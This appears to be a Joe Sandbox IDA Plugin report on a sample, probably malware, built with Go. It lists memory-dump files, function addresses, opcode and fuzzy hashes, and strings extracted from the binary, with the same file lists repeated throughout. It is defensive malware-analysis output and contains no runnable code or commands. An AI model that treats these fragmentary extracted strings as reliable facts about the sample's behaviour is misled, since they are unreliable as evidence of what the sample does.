Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: 9$base of ) = <==GOGC] = pc=none+Inf-Inf: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp= gp= mp=) m=quitbindJuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT as hourTagsTypeNONEarn:AhomChamKawiLisuMiaoModiNewaThaiToto3125Atoiint8uintchanfuncpartcall$checkmark found unmarked objectruntime: failed to commit pages/memory/classes/heap/free:bytes/memory/classes/os-stacks:bytespacer: sweep done at heap size non in-use span in unswept listcasgstatus: bad incoming valuesresetspinning: not a spinning mentersyscall$objgc %: gp *(in n= ) - NaN P m= MPC= < end > and]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-0$runtime: checkmarks found unexpected unmarked object obj=x-amz-copy-source-server-side-encryption-customer-key-md5sync: WaitGroup misuse: Add called concurrently with Waittls: Ed25519 public keys are not supported before TLS 1.2received record with version %x $runtime: found obj at *(runtime: VirtualFree of /cgo/go-to-c-calls:calls/gc/heap/objects:objects/sched/latencies:secondsqueuefinalizer during GCupdate during transitionruntime: markroot index can't scan our own stackgcDrainN phase incorrectpageAlloc: out of me
API String ID: 0-287735659
Opcode ID: e480162bbd2ca4f4ec11f8feecb453412d78d3bad0c801fa1e1b96a334e59034
Instruction ID: ff69dec13a77f2f5618cee24c3a0458cd7aa4c49f5a8287c6edfd715159e53e0
Opcode Fuzzy Hash: e480162bbd2ca4f4ec11f8feecb453412d78d3bad0c801fa1e1b96a334e59034
Instruction Fuzzy Hash: 064138B41097448FC341EF68C085B6ABBE0AF89304F8488ACF4C887352D7789948DFA3

Function 00B1ED60 Relevance: 7.6, Strings: 6, Instructions: 98COMMON

Download Yara Rule

Strings

runtime: casfrom_Gscanstatus bad oldval gp=runtime:stoplockedm: lockedg (atomicstatus=methodValueCallFrameObjs is not in a moduleinterrupted system call should be restartedERROR: failed to load CSM configuration, %vbufio: tried to rewind past start of buffermu, xrefs: 00B1EE72
casfrom_Gscanstatus: gp->status is not in scan stateConvertSecurityDescriptorToStringSecurityDescriptorWConvertStringSecurityDescriptorToSecurityDescriptorWerrors: *target must be interface or implement errortls: server selected unsupported protocol version %x, xrefs: 00B1EE57
7, xrefs: 00B1EF07
casfrom_Gscanstatus:top gp->status is not in scan state is currently not supported for use in system callbacksSOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zonesbufio.Scanner: SplitFunc returns negative advance countreflect: internal error: invalid use of , xrefs: 00B1EEFE
runtime: casfrom_Gscanstatus failed gp=stack growth not allowed in system calltraceback: unexpected SPWRITE function transport endpoint is already connected2006-01-02 15:04:05.999999999 -0700 MSTwmi: cannot load field %q into a %q: %sunable to get read client , xrefs: 00B1EDCB
, oldval=, newval= threads=: status= blocked= lockedg=atomicor8 runtime= m->curg=(unknown)traceback} stack=[ lockedm=interruptbus errorFindCloseLocalFreeMoveFileWWriteFileWSASendTontdll.dllWednesdaySeptember-07:00:00Z07:00:00ExecQueryParseBoolca_bundleus-east-, xrefs: 00B1EDED, 00B1EE94

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: , oldval=, newval= threads=: status= blocked= lockedg=atomicor8 runtime= m->curg=(unknown)traceback} stack=[ lockedm=interruptbus errorFindCloseLocalFreeMoveFileWWriteFileWSASendTontdll.dllWednesdaySeptember-07:00:00Z07:00:00ExecQueryParseBoolca_bundleus-east-$7$casfrom_Gscanstatus: gp->status is not in scan stateConvertSecurityDescriptorToStringSecurityDescriptorWConvertStringSecurityDescriptorToSecurityDescriptorWerrors: *target must be interface or implement errortls: server selected unsupported protocol version %x$casfrom_Gscanstatus:top gp->status is not in scan state is currently not supported for use in system callbacksSOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zonesbufio.Scanner: SplitFunc returns negative advance countreflect: internal error: invalid use of $runtime: casfrom_Gscanstatus bad oldval gp=runtime:stoplockedm: lockedg (atomicstatus=methodValueCallFrameObjs is not in a moduleinterrupted system call should be restartedERROR: failed to load CSM configuration, %vbufio: tried to rewind past start of buffermu$runtime: casfrom_Gscanstatus failed gp=stack growth not allowed in system calltraceback: unexpected SPWRITE function transport endpoint is already connected2006-01-02 15:04:05.999999999 -0700 MSTwmi: cannot load field %q into a %q: %sunable to get read client
API String ID: 0-3158602290
Opcode ID: 7c411d23b97287cd5c9ed29a6372b424ef9aa1e22b49715fcaa9cac4f1731641
Instruction ID: 69988619dd9a30aeaecf6b979e63e4eee2a9df9fee18b4a0e73bae0a0daca5d0
Opcode Fuzzy Hash: 7c411d23b97287cd5c9ed29a6372b424ef9aa1e22b49715fcaa9cac4f1731641
Instruction Fuzzy Hash: 7A41F4B41497058FC301FF64D1856AEBBE4AF89744F8188ADE4D887352E7749888DB63

Function 00B1F000 Relevance: 6.5, Strings: 5, Instructions: 297COMMON

Download Yara Rule

Strings

casgstatus: bad incoming valuesresetspinning: not a spinning mentersyscallblock inconsistent runtime: split stack overflow: ...additional frames elided...unsafe.String: len out of rangecannot assign requested address.lib section in a.out corruptedW. Central A, xrefs: 00B1F3F8
1, xrefs: 00B1F353
newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02drole_arncsm_hostcsm_portUploadIdEqualSidSetEventIsWindowrecvfromnil PoolArme, xrefs: 00B1F3C4
runtime: casgstatus: oldval=gcstopm: negative nmspinningfindrunnable: netpoll with psave on system g not allowednewproc1: newg missing stacknewproc1: new g is not GdeadFixedStack is not power-of-2missing stack in shrinkstack args stack map entries for invalid , xrefs: 00B1F39A
casgstatus: waiting for Gwaiting but is Grunnablestrings.Reader.UnreadByte: at beginning of stringstrings.Reader.WriteTo: invalid WriteString countinvalid or incomplete multibyte or wide characterinvalid value for environment variable, %s=%s, %vinternal error:, xrefs: 00B1F34A

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02drole_arncsm_hostcsm_portUploadIdEqualSidSetEventIsWindowrecvfromnil PoolArme$1$casgstatus: bad incoming valuesresetspinning: not a spinning mentersyscallblock inconsistent runtime: split stack overflow: ...additional frames elided...unsafe.String: len out of rangecannot assign requested address.lib section in a.out corruptedW. Central A$casgstatus: waiting for Gwaiting but is Grunnablestrings.Reader.UnreadByte: at beginning of stringstrings.Reader.WriteTo: invalid WriteString countinvalid or incomplete multibyte or wide characterinvalid value for environment variable, %s=%s, %vinternal error:$runtime: casgstatus: oldval=gcstopm: negative nmspinningfindrunnable: netpoll with psave on system g not allowednewproc1: newg missing stacknewproc1: new g is not GdeadFixedStack is not power-of-2missing stack in shrinkstack args stack map entries for invalid
API String ID: 0-10673258
Opcode ID: 3293d9a1a2df9199856646f3916df7744131b37ef96c6563329207c586c7ff10
Instruction ID: 2fa3721511632be503b83a9681276bea114a555194ed72374d84ffa1ea1bfb7c
Opcode Fuzzy Hash: 3293d9a1a2df9199856646f3916df7744131b37ef96c6563329207c586c7ff10
Instruction Fuzzy Hash: 9AC116746093458FD704EF24C0947AABBE1FF89304F9089ADE4958B362D775E885DB82

Function 00B31860 Relevance: 6.4, Strings: 5, Instructions: 194COMMON

Download Yara Rule

Strings

stack size not a power of 2too many callback functionstimer when must be positive: unexpected return pc for channel number out of rangecommunication error on sendkey was rejected by servicenot a XENIX named type fileCertEnumCertificatesInStoreEaster Island Sta, xrefs: 00B31AD4
stackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativeruntime: name offset out of rangeruntime: type offset out of rangetoo many levels of symbolic linksInitializeProcThreadAttribute, xrefs: 00B31AEA
!, xrefs: 00B31AF3
out of memory is nil, not value method bad map state span.base()=bad flushGen , not pointer != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=, xrefs: 00B319CB
out of memory (stackalloc)shrinking stack in libcallruntime: pcHeader: magic= traceRegion: out of memoryinvalid request descriptorno CSI structure availablerequired key not availableno message of desired typename not unique on networkCertFreeCertificateContext, xrefs: 00B31900

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: !$out of memory (stackalloc)shrinking stack in libcallruntime: pcHeader: magic= traceRegion: out of memoryinvalid request descriptorno CSI structure availablerequired key not availableno message of desired typename not unique on networkCertFreeCertificateContext$out of memory is nil, not value method bad map state span.base()=bad flushGen , not pointer != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=$stack size not a power of 2too many callback functionstimer when must be positive: unexpected return pc for channel number out of rangecommunication error on sendkey was rejected by servicenot a XENIX named type fileCertEnumCertificatesInStoreEaster Island Sta$stackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativeruntime: name offset out of rangeruntime: type offset out of rangetoo many levels of symbolic linksInitializeProcThreadAttribute
API String ID: 0-1460487588
Opcode ID: 5d943cda8db97927dbce03b9e2ceebbf5af4eea877ebaa9712cfe52b8016e3a5
Instruction ID: 83aefbd957abc4dbd103cf738310df3650dfaf2c731267136e657686f4e556a3
Opcode Fuzzy Hash: 5d943cda8db97927dbce03b9e2ceebbf5af4eea877ebaa9712cfe52b8016e3a5
Instruction Fuzzy Hash: 3A817A746093458FC714EF29C090A6ABBF5FF89310F248DADE88987355E734E945CB92

Function 00AED8B0 Relevance: 6.4, Strings: 5, Instructions: 181COMMON

Download Yara Rule

Strings

persistentalloc: size == 0/gc/cycles/total:gc-cyclesnegative idle mark workersuse of invalid sweepLockerruntime: bad span s.state=freedefer with d.fn != nilforEachP: P did not run fnwakep: negative nmspinningstartlockedm: locked to meentersyscall inconsistent , xrefs: 00AEDB2C
persistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freeattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: incons, xrefs: 00AEDB00
*, xrefs: 00AEDB1F
runtime: cannot allocate memorycheckmark found unmarked objectruntime: failed to commit pages/memory/classes/heap/free:bytes/memory/classes/os-stacks:bytespacer: sweep done at heap size non in-use span in unswept listcasgstatus: bad incoming valuesresetspinnin, xrefs: 00AEDAD8
persistentalloc: align is not a power of 2out of memory allocating checkmarks bitmap/cpu/classes/gc/mark/dedicated:cpu-seconds/memory/classes/metadata/mcache/free:bytes/memory/classes/metadata/mspan/inuse:bytesnon-empty mark queue after concurrent marksweep: t, xrefs: 00AEDB16

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: *$persistentalloc: align is not a power of 2out of memory allocating checkmarks bitmap/cpu/classes/gc/mark/dedicated:cpu-seconds/memory/classes/metadata/mcache/free:bytes/memory/classes/metadata/mspan/inuse:bytesnon-empty mark queue after concurrent marksweep: t$persistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freeattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: incons$persistentalloc: size == 0/gc/cycles/total:gc-cyclesnegative idle mark workersuse of invalid sweepLockerruntime: bad span s.state=freedefer with d.fn != nilforEachP: P did not run fnwakep: negative nmspinningstartlockedm: locked to meentersyscall inconsistent $runtime: cannot allocate memorycheckmark found unmarked objectruntime: failed to commit pages/memory/classes/heap/free:bytes/memory/classes/os-stacks:bytespacer: sweep done at heap size non in-use span in unswept listcasgstatus: bad incoming valuesresetspinnin
API String ID: 0-1480168796
Opcode ID: 7bfc10e4929554ee79dad2b874e3075b5828fd6b48e1cf014ba820dfb32c85d3
Instruction ID: 009e42c940c292b40a52360673e212a5e34829dd8a746d76e85acdaf315b0249
Opcode Fuzzy Hash: 7bfc10e4929554ee79dad2b874e3075b5828fd6b48e1cf014ba820dfb32c85d3
Instruction Fuzzy Hash: 83813874609386CFC714EF25C58066ABBF1FF89314F14886DE8988B355E734EA85CB92

Function 00AF4BA0 Relevance: 6.4, Strings: 5, Instructions: 153COMMON

Download Yara Rule

Strings

refill of span with free space remaining/cpu/classes/scavenge/assist:cpu-secondsruntime.SetFinalizer: first argument is failed to acquire lock to reset capacitymarkWorkerStop: unknown mark worker modecannot free workbufs when work.full != 0runtime: out of memo, xrefs: 00AF4DEF
out of memory is nil, not value method bad map state span.base()=bad flushGen , not pointer != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=, xrefs: 00AF4DB7
(, xrefs: 00AF4DF8
span has no free space/gc/scan/globals:bytes/gc/heap/frees:objectsruntime: work.nwait = runtime:scanstack: gp=scanstack - bad statusheadTailIndex overflowruntime.main not on m0set_crosscall2 missingbad g->status in readywirep: invalid p stateassembly checks fa, xrefs: 00AF4DA1
bad sweepgen in refillspan has no free space/gc/scan/globals:bytes/gc/heap/frees:objectsruntime: work.nwait = runtime:scanstack: gp=scanstack - bad statusheadTailIndex overflowruntime.main not on m0set_crosscall2 missingbad g->status in readywirep: invalid p s, xrefs: 00AF4DD9

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
